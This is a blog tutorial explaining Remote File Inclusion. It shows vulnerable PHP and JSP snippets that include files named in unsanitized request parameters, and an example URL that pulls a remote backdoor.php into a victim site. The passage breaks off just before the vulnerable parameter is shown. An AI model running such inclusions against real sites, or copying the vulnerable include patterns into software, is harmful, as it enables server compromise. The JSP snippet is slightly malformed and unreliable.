Thursday, July 12, 2018

Remote File Inclusion (RFI) Tutorial

Remote File Inclusion (RFI)

Hello Guys! In this article we will learn how to exploit a RFI vulnerability. I hope you have read my previous article on Local File Inclusion, if you haven’t please go and read that first.

Remote File Inclusion (RFI)

As the name states if the attacker can include a remote file to the victim web app, it is called a Remote File Inclusion Vulnerability (RFI). Take a look at this piece of code:

Code :
$incfile = $_REQUEST["file"]; include($incfile.".php");

As you can see in the first line, it extracts the file parameter value from the HTTP request made by the user, while the second line utilities this value to set the file name. If the input is not being sanitized properly it can be used to include malicious file from a remote server. Here’s a vulnerable JSP code,

Code :
<c:import url=”<=request.getParameter(“conf”)%>”>

Again, If the input is not sanitized properly it can be used to include a malicious file from a remote server. RFI is not a common vulnerability at all but it is very dangerous when exploited. Now you must be wondering how to exploit this vulnerability. Hold on, I will demonstrate it with a real life example. We have a URL here,

Example :
http://www.victim.com/file.php?view=http://docs.mysite.com/backdoor.php

Lets break things down

www.victim.com is the target website

file.php is a webpage with the parameter view=

For example if the user wants to view a document related to animals, the webpage file.php loads it via the view= parameter.

Take a close look at view= , if it was including local files like view=/files/animals.php we would have test for Local File Inclusion. But as we can see its including files from docs.example.com which is a different website, it means it loads files from other website which means it may include any malicious file too. Enough theory! So here’s the vulnerable parameter